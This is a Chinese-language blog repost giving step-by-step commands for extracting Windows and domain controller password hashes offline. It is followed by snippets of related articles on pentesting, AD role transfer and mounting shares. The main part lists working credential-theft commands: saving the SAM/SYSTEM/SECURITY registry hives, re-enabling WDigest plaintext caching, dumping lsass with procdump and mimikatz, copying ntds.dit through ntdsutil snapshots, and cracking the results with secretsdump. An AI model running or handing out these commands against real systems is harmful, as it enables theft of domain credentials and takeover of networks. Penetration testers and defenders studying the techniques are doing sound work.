离线提取域控HASH的方法

1、注册表提取



提取文件,Windows Server 2003或者Win XP 及以前需要提升到system权限,以后只要Administrator权限即可。

reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security secruity.hive

本地获取

#如果要提取明文,请修改注册表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
#破解hash
python ./secretsdump.py -sam ~/Desktop/sam.hive  -security ~/Desktop/security.hive -system ~/Desktop/system.hive  LOCAL

2、lsass.exe提取



procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz#privilege::debug
mimikatz#sekurlsa::minidump lsass.dmp
mimikatz#sekrulsa::logonpasswords full  

3、ntds.dit提取


ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy MOUNT_POINT\windows\ntds\ntds.dit c:\temp\ntds.dit
ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit


python ./secretsdump.py -ntds ~/Desktop/ntds.dit -system ~/Desktop/system.hiv  LOCAL

原文地址:https://www.cnblogs.com/KevinGeorge/p/10450034.html

时间: 2024-08-12 06:57:01

离线提取域控HASH的方法的相关文章

windows 2003 windows 2008 windows 2012 导出域控hash的方法

quarkspwdump作者介绍的用法: 1. Windows 2008       Microsoft recently implements VSS (Volume Shadow Copy Service) which allow an administrator to make   filesystem snapshots while the operating is running and writing to current backuped files.       Here is

windows 2003 域控服务器导出全部hash的方法

天下文章一大抄,我也是醉了... 一份"错误"的文章一遍又一遍的被转载,盲目转载,根本不细看.只会误导新手. 谈下windows2003域控下如何导出全部的hash信息. 1. 使用备份还原向导 2.使用高级模式 选择:只备份系统状态数据 继续下一步:选择保存位置 最终 . 等待备份完成..... 接下来是还原: 继续使用该向导 高级 选择刚那份备份文件. 在高级中选择保存的位置: 等待.... 还原完成后,会在刚的c:\hello\active directory文件夹下生成ntds

离线提取目标机hash

0x01 前言 很多环境下,不允许上传或者使用mimikatz.而针对非域控的单机离线提取hash显得尤为重要. 在meterpreter shell命令切到交互式cmd命令. 0x02 过程 reg save 方式使得需要下载的目标机 Ps:reg save将指定子项.项的注册表值的副本保存到指定文件中 我们需要导出的hash文件 reg save HKLM\SYSTEM sys.hiv reg save HKLM\SAM sam.hiv reg save hklm\security secu

Windows server 2012 角色转移及删除域控方法

本章博文讲述Windows server 2012 如何夺取主域控角色及删除域控方法 .针对不同的运行环境,对操作方法进行了归纳与总结   . 下面分2种情况做介绍  : 一.环境:主域控制器ds01.bicionline.org ,辅域控制器pdc01.bicionline.org  , 两台域控服务器运行正常,相互间可以实现AD复制.目的:主域控服务器把RID.PDC.Domain.Schema.Naming角色及GC功能转移到辅助域控制器,并降级成普通服务器.解决思路:通过图形界面或命令行

Windows server 2012 域控制器之间角色转移及清理域控方法,实现辅助域控提升为主域控

本章博文讲述Windows server 2012 域控制器之间角色转移及删除域控方法 .针对不同的应用场景,对操作方法进行了归纳与总结   . 下面分2种场景做介绍  : 场景1:主域控制器与辅助域控制器运行正常,相互间可以实现AD复制功能.需要把辅助域控制器提升为主域控制器 ,把主域控制器降级为普通成员服务器:这种场景一般应用到原主域控制器进行系统升级(先转移域角色,再降级,再安装或升级高版本系统,再次转移角色恢复到主域控制器角色)或使用配置更高的服务器替代原主域控制器起到主域控制的作用(使

一次完整的从webshell到域控的探索之路

前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里. 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求. 今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来. 相关知识点总结如下: 免杀 payload 的生成,请使用 Veil msf 在 meterpreter 下的提权尝试 msf 在 meterpreter 下的 bypassuac 尝试 内网渗透测试过程中的信息关联 met

Win Server 2008 R2主域控灾难恢复

好久没写东西了,前几天遇到一个企业,因为主域控在没有任何保护的情况下,裸奔后感染病毒,直接垮掉了(无语),且无法恢复.希望能够对其进行完整功能的灾难恢复,今天就跟大家分享一下恢复的过程. 整个过程不难,但是大家在做这种操作的时候,思路一定要清晰,且操作的时候一定要仔细. 具体思路步骤:(可能不完善,欢迎大家补充) 1. 彻底检查主域控SRVDC01状态,这里主要包括是否彻底无法启动 or 只是功能故障 2. 如果主域控还能勉强单机登录的话,备份一切可以备份的有用文件资料或者应用配置,如CA证书服

从外网到域控(vulnstack靶机实战)

前言 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 拓扑结构大体如下: 话不多说,直接开搞.. 外网初探 打开页面后发现是一个Yxcms的站点,关于Yxcms的漏洞可以参考:https://www.freebuf.com/column/162886.html 然后找到后台,随手一个弱口令:admin.123456便进入了后台(实战中也有很多的站点是弱口令,只能说千里之堤溃于蚁

Centos挂载windows域控共享目录

一 环境 SERVER:windows server 2012 R2 DC域控 IP:192.168.1.11 CLIENT:Centos 6.5 二 mount挂载 命令: mount -t cifs -o username='test\testuser',password='test' "//192.168.1.11/server test/test" /mnt/test mount: block device //192.168.1.11/server test/test is